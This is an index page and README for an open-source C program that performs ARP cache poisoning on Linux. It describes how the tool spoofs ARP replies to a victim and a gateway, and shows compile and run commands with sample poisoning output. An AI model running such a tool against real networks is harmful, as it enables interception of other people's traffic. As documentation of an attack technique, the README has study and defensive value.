Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/arkregiel/arp-spoofing
ARP cache poisoning in C with raw sockets (Linux)
https://github.com/arkregiel/arp-spoofing
arp-poisoning arp-reply arp-request arp-spoofing c-programming raw-sockets
Last synced: 7 days ago
JSON representation
ARP cache poisoning in C with raw sockets (Linux)
- Host: GitHub
- URL: https://github.com/arkregiel/arp-spoofing
- Owner: arkregiel
- License: mit
- Created: 2022-09-04T21:42:14.000Z (over 2 years ago)
- Default Branch: main
- Last Pushed: 2022-09-06T17:01:18.000Z (over 2 years ago)
- Last Synced: 2024-11-14T04:27:11.352Z (2 months ago)
- Topics: arp-poisoning, arp-reply, arp-request, arp-spoofing, c-programming, raw-sockets
- Language: C
- Homepage:
- Size: 11.7 KB
- Stars: 1
- Watchers: 1
- Forks: 0
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
- License: LICENSE
Awesome Lists containing this project
README
# ARP Spoofing
C program performing ARP cache poisoning (works on Linux).
Program:
- obtains MAC addresses of remote hosts with ARP requests
- sends gratuitous ARP reply packets with local MAC addressProgram doesn't restore ARP caches of remote hosts.
## Disclaimer
This is for educational purposes only. I DO NOT encourage or promote any illegal activities.
## Usage
```
$ sudo ./a.out
```Example:
```
$ gcc -Wall arp_spoof.c
$ sudo ./a.out eth0 192.168.8.100 192.168.8.1
Linux ARP spoofer
-----------------
Looking for MAC addresses...
Local MAC address is aa:bb:cc:dd:ee:ff
Local IP address is 192.168.8.101
Victim's (192.168.8.100) MAC address: 11:22:33:44:55:66
Gateway's (192.168.8.1) MAC address: ff:ee:dd:cc:bb:aa
Poisoning...
Sent ARP reply to victim
Sent ARP reply to gateway
Sent ARP reply to victim
Sent ARP reply to gateway
^C
```Ctrl + C to stop